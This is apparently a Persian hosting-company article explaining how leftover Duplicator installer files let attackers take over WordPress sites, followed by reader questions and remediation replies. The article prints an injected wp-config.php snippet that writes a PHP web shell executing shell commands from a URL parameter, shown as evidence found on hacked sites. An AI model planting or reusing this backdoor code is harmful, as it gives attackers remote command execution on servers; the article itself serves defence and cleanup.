آسیب پذیری بسیار خطرناک در افزونه Duplicator وردپرس
در طی این دو ماه گذشته متاسفانه وردپرس مورد حمله هکرها در سطح جهان قرار گرفته است که همین موضوع باعث قرارگیری وردپرس در برابر هک گسترده شده است. ماه گذشته شاهد این بودیم که فایل wp-config.php وردپرس در بسیاری از سایتها به صورت خودکار حذف شده و هنگام مراجعه به سایت با صفحه نصب وردپرس مواجه میشدیم. طی چند روز گذشته نیز بسیاری از سایتهای وردپرسی که از افزونه Duplicator استفاده میکنند مورد حمله قرار گرفته و از طریق کنترل و اجرای دستورات از راه دور توسط هکرها مورد هک قرار گرفتهاند.
در این مقاله از پایگاه دانش میزبانفا به بررسی هک سایتهای وردپرسی توسط افزونه Duplicator میپردازم که اگر از این افزونه استفاده میکنید و در معرض هک در سایت قرار گرفتهاید با استفاده از این آموزش قادر به برطرف کردن مشکلات خود باشید.
خطر هک گسترده در وردپرس توسط افزونه Duplicator
همانطور که میدانید افزونه Duplicator وردپرس امکان ساخت بسته نصب آسان در وردپرس را به شما میده که با این افزونه میتونید از محتوا و تنظیمات کامل یک وبسایت یک نسخه به صورت کپی شده تهیه کرده و سپس با استفاده از نصب بسته آسان در وردپرس همین نسخه کپی شده را در سایت دیگر و با دامنهای متفاوت بدون اینکه نیاز باشه صفحات را از نو طراحی کنید، انتقال بدین. بنابراین استفاده از این افزونه بسیار بالا بوده و این افزونه تاکنون موفق شده بیش از یک میلیون نصب فعال در مخزن وردپرس رو ازآن خودش بکنه که فروش قالبهای وردپرس با استفاده از این افزونه هم باعث شده تا میزان استفاده از این افزونه رقمی بالای 10 میلیون رو به خودش اختصاص بده.
چطور افزونه Duplicator باعث هک سایت خواهد شد؟
همونطور که میدونید با استفاده از این افزونه کلیه تنظیمات و اطلاعات دیتابیس، قالب وردپرس، افزونههای وردپرس و به طور کلی هر اطلاعاتی که در وردپرس دارید این امکان رو پیدا میکنه که یک نسخه خروجی ازش تهیه کنید. در این نسخه خروجی شما دو فایل installer.php و فایی که شامل محتویات سایت و دیتابیس هست رو خواهید داشت که با استفاده از فایل database.sql هم امکان درون ریزی دادههای دیتابیس در سایت جدید فراهم خواهد شد.
حالا وقتی که تصمیم به نصب قالب با استفاده از بسته نصبی در سایت خودتون میگیرید، فایلهای database.php، installer.php، installer-backup.php، installer-log.txt و installer-data.sql و پوشه wp-snapshot نیز در کنار سایر فایلهای پیشفرض وردپرس قرار میگیرند. مشکل هک وردپرس درست از همینجا آغاز میشه که به دلیل وجود باگ در این افزونه باعث میشه که هکر بتونه امکان دو بار نصب وردپرس رو به دست بیاره که یک بار هم مشابه همین مشکل در سال گذشته رخ داد و باعث هک بسیاری از سایتهای وردپرسی شد.
این موضوع باعث میشه که هکر در مرحله اول سایت شما را ریست بکنه و با ارسال یک سری فایل مخرب فایل wp-config.php وردپرس را ویرایش کرده و از نو بازنویسی بکنه که این مسئله اولین قدم برای از دست خارج شدن سایت هست. طی بررسی که روی چند فایل wp-config.php برخی سایتها داشتیم کدهای این فایل به شکل زیر تغییر کرده بودند.
// ** MySQL settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define('DB_NAME', 'test '); file_put_contents("test.php", '<pre><?php if (isset($_GET["synacktiv_backdoor"])) { echo shell_exec($_GET["synacktiv_backdoor"]); } ?></pre>'); / * '); /** MySQL database username */ define('DB_USER', 'test'); /** MySQL database password */ define('DB_PASSWORD', 'test'); /** MySQL hostname */ define('DB_HOST', 'nowhere:12345'); /** Database Charset to use in creating database tables. */ define('DB_CHARSET', 'utf8'); /** The Database Collate type. Don't change this if in doubt. */ define('DB_COLLATE', '');
همونطور که میبینید اطلاعات دیتابیس به صورت کلی از بین رفته و با چیز دیگه جایگزین شده و علاوه بر این هم یک سری کد در این فایل تزریق شده که باعث شده هکر یک درب پشتی برای هک مجدد برای خودش ایجاد بکنه. بعد از این هک گسترده معمولا با دو مشکل اساسی مواجه خواهید شد.
- وقتی با دستکتاپ وارد سایتتون بشید با خطای 500 در وردپرس مواجه میشوید.
- وقتی با موبایل وارد سایت شوید با ریدایرکت شدن از چند آدرس به آدرس دیگه در نهایت به شکلی به صفحات تبلیغ و اسپم هدایت خواهید شد.
مسئله بعدی که رخ میده اینه که علاوه بر فایلهای پیشفرض وردپرس یک سری فایل php و web.config دیگه هم در public_html سایت شما اضافه خواهد شد. که تمامی مشکلات و هک شدن سایت به خاطر پاک نکردن فایل installer.php و عدم آپدیت این افزونه به وجود اومده.
راهکار چیست؟ چطور سایت هک شده را برگردانیم؟
اولین کاری که باید انجام بدین این هست که آخرین نسخه بک آپ وردپرس را بازگردانی کنید که به صورت سالم هست. برای این کار میتونید از میزبانی هاست خودتون بخواین که آخرین نسخه بک آپ رو در سایت شما جایگزین بکنه. سپس نسخه آپدیت شده افزونه Duplicator وردپرس که بعد از این بررسی شده و مشکل هک برطرف شده را از مخزن وردپرس دانلود کنید. اگر به پیشخوان وردپرس دسترسی داشتید اقدام به آپدیت افزونه بکنید و در صورت عدم دسترسی هم میتونید با استفاده از راهنمای نصب افزونه در وردپرس به صورت دستی و از طریق هاست افزونه را آپدیت کنید.
از اونجایی که به این افزونه احتیاجی نخواهید داشت سعی کنید سریعا بعد از آپدیت از سایت حذفش کنید و در نهایت فایلهای database.sql، installer.php، installer-backup.php، installer-log.txt و installer-data.sql که در هاست قرار داره رو هم پاک کنید.
برای سهولت امر می توانید از پیشخوان وردپرس به منوی duplicator و سپس زیر منوی tools مراجعه نمایید. سپس روی دکمه Remove Installation Files کلیک نمایید تا فایل های مربوطه حذف شوند.
بعد از انجام این کار میتونید از خطر هک مجدد جلوگیری کنید. اگر هم تا کنون سایت شما مورد هک قرار نگرفته حتما همه این راهکارها رو دنبال کنید، چرا که این باگ به صورت گسترده است و تا زمانی که از آخرین نسخه افزونه استفاده نکنید، سایت هک خواهد شد.
سلام جناب صادقی عزیز،
من این خبر رو مدتی قبل شنیدم و با توجه به اینکه به افزونه مذکور نیازی نداشتم افزونه داپلیکتور رو کلا حذف کردم. همین کار به تنهایی کافی نیست؟
سلام، چرا کافیه. مشکلی از این نظر نیست. نکته مهم اینه که حتما باید فایلهای Installer.php و… که تو مقاله معرفی شدن رو حتما پاک کنید.
سلام
من الان سایتم هک شده و نسخه پشتیبان سایتم هم موجود نیست
برای رفع مشکل باید چیکار کنم و چطوری این تروجانرو پاک کنم
الان وردپرس و افزونه هارو آپدیت کردم ولی قسمت نوشته های سایتم که کلیک میکنم همچنان ریدایرکت میشه
ممنون میشم پاسخ بدید
سلام جواد جان،
اگر هاست خریداری کردید و به صورا اختصاصی استفاده نمیکنید، از میزبانی هاستتون درخواست کنید که آخرین بک آپی که دارن رو برای سایتتون ریستور کنند. در غیر این صورت باید از یک متخصص وردپرس برای بررسی کامل سایتتون و رفع مشکل کمک بگیرید.
از اونجایی که این هک گسترده به خاطر وجود باگ بوده هر هکر به صورت سلیقهای عمل کرده و طوری نیست که بگیم تو همه سایتها به صورت عمومی یک کار انجام گرفته که با این روشها برطرف بشه.
سلام
فایل هایی که فرمودید حذف شود به صورت مستقیم در public html بود اما فایلی مثل database.php در افزونه wp rocket یافت شد. آیا باید حذف شود و یا این فایل مربوط به افزونه هست؟ چون در یک وب سایت دیگه هم که چک شد این فایل در همین افزونه یافت شد.
سلام، خیر
فایلهایی که مربوط به داپلیکیتور هستن در مسیر public_html و در مسیر نصب وردپرس قرار دارند.
سلام دوست عزیز
پشتیبانی اعلام کرده سایت من هک شده
ولی هیچ کدوم ازعلائمی که شماگفتید رو نداره
الان من نمیدونم سایتم هک شده یا نه
لطفا راهنمایی کنید
ممنون
سلام، این هک طوری نبوده که در همه سایتها یکسان باشه. بیشتر سایتهای بررسی شده اتفاقی که براشون افتاد داخل این مقاله گفته شده، حالا ممکنه سایت شما به شکل دیگه هک شده باشه. برای این کار بهتره از یک متخصص کمک بگیرید.
سلام اگر .یراشگر حذف بشه ازکدم افزونه برای ویراش استفاده کنیم؟
منظورم اینکه که به صورت دستی از cpanel انجام بدیم؟
سلام،
اگه منظورتون ویرایشگر وردپرس هست باید وردپرس رو دانلود کنید و فایل wp-config.php و پوشه wp-content رو از داخلش حذف کنید. بعد باقی پوشهها و فایلها رو جایگزین پوشه و فایل فعلی در هاست بکنید.
سلام سایت بنده نیز با همین مشکل مواجه هست و این که نمی دونم کدوم بکاپ سالم از کجا می توان از سالم بودن بکاپ اطمینان حاصل کنم ممنون
سلام، باید فایلهای بک آپ رو بررسی کنید. از میزبانی هاستتون کمک بگیرید.
سلام
در public فایل database.php برای من وجود نداشت. ولی بقیه رو حذف کردم
بجاش فایلی هست با نام database.sql منظور همون .php یا این فایل دیگه ای؟
پاک کنم؟
سلام، موردی نداره مهم فایل installer.php هست. باقی فایلها ضرورتی به پاک کردنشون نیست.
ممنون مهندس
لطفا در مورد امنیت وردپرس مقاله های بیشتری بنویسید.
گاهی اوقات مدیران ضررهای میلیونی میکنن بخاطر پاک شدن اطلاعات…
جناب صادقی سوالی که ذهنم رو مشغول کرده اینه که چطور با این پسورد های پیچیده که ورد پرس برا دیتا بیس تعریف میکنه هکرها بازم به سی پنل نفوذ میکنن؟ سوال دوم هدفشون چیه؟
سلام، ممنون از شما
این مسئله میتونه دلایل مختلفی داشته باشه و نفوذ به سی پنل اگه رخ بده نشون دهنده ضعف میزبانی در تامین امنیت سی پنل خواهد بود. البته در برخی موارد کاربران خودشون هم باید موارد امنیتی رو رعایت کنند. مثل استفاده از آموزش تایید دو مرحله ای سی پنل
هدف میتونه هر چیزی باشه 🙂
با سلام ممنون از توضیحات کامل و خوبتان
پوشه wp-snapshot هم که ایجاد شده را حذف کنم
سلام، بله این پوشه رو هم میتونید حذف کنید.
سلام سایت من همین مشکل براش پیش اومده. از فایل های installer-backup و installer-data و installer-log دو سری موجود هست. یکی در public_html و یکی در public_html/wp . کدوم سری باید پاک بشن؟ البته فایل installer.php و database.sql ندارم.
سلام روزبخیر؛
دقیقا در محلی که قالبتون رو نصب کردید باید فایل های مذکور رو جستجو کنید.
به عنوان مثال اگر قالب در پابلیک هاستتون نصب شده این فایل ها رو دقیقا در public_html میبینید. یا به عنوان مثال اگر در ساب دایرکتوری wp نصب انجام شده این فایل ها رو در دایرکتوری wp میبینید.
با سلام
جناب آقای صادقی اخیرا دو بار بدلیل تغییر نام کاربری مدیریت وردپرس توسط هکر نتونستم وارد وردپرس بشم که هر بار از طریق دیتا بیس
نام کاربریم را عوض میکنم و بعد وارد مدیریت میشم.
لازم به ذکر است هکر در جدول wp_users.sql فقط قسمت user_login را به نام wild تغییر میدهد و بقیه قسمتها را نه.
لطفا راهنمایی فرمایید چجوری میتونم راه نفوذ را ببندم.
ممنون و سپاس
سلام،
بهتره از یک توسعه دهنده وردپرس کمک بگیرید که سایتتون رو بررسی کنن.
سلام روز بخیر با پاک کردن فایل نصبی از پابلیک مشکل حل میشه ؟ و دیگه هک صورت نمیگیره بنده هک شدم و نگرانم که مجددا اطلاعاتم از بین بره لطفا راهنماییم کنیم
سلام روز بخیر؛
وجود یکسری فایل ها در مسیر نصب قالب، باعث نفوذپذیری میشه پس پاک کردن این فایل ها یکی از راه های نفوذپذیری امنیتی را مسدود میکنه.
اگر هک شده باشید صرفا پاک کردن یکسری فایل مشکلتون رو رفع نمیکنه و هاستتون باید حتما بازنگری و پاکسازی بشه.
کدهای قالب رو هم بررسی کنید بک دور داخل کدها وجود نداشته باشه. به صورت کامل هاستتون اسکن امنیتی بشه.
سلام. مرسی از مقاله تون.
جسارتا من فکر میکنم یک جا اشتباه تایپی رخ داده. اواخر مقاله، در بخش حذف فایلها، فرمودین فایل database.php باید حذف بشه. در صورتی که این فایل موجود نیست. فکر میکنم منظورتون فایل database.sql بوده درسته؟
سلام روزبخیر؛
فایل های زیر را باید در هاستتون در مسیر نصب قالب جستجو کنید:
installer.php
installer-backup.php
installer-data.sql
database.sql
installer-log.txt
ممکنه اسم فایلتون حاوی اعداد هم باشه.
سلام نصب و راه اندازی افزونه wordfance خیلی با آموزش های شما فرق داره. من الان شدیدا بهش نیاز دارم. چجوری میتونم راهنمایی بگیرم؟
سلام و احترام؛
بله این آموزش بر اساس نسخه های قبلی نوشته شده در برنامه کاری آپدیت این مورد رو هم قرار دادیم.
بسیار عالی و متشکرم. حتما بهمون اطلاع بدید ممنون میشم
خواهش میکنم. چشم حتما
موفق و پایدار باشید.
سلام
استفاده از افزونه های رایگان وردپرس مشکل امنیتی میاره؟
آخه شنیدم افزونه رایگان رو نصب نکنید درسته؟
سلام و احترام؛
استفاده از افزونه های نال شده را پیشنهاد نمی کنیم.
در خصوص افزونه های غیر تجاری و رایگان هم این نکته را در نظر بگیرید که حتما از منابع معتبر دانلود کنید.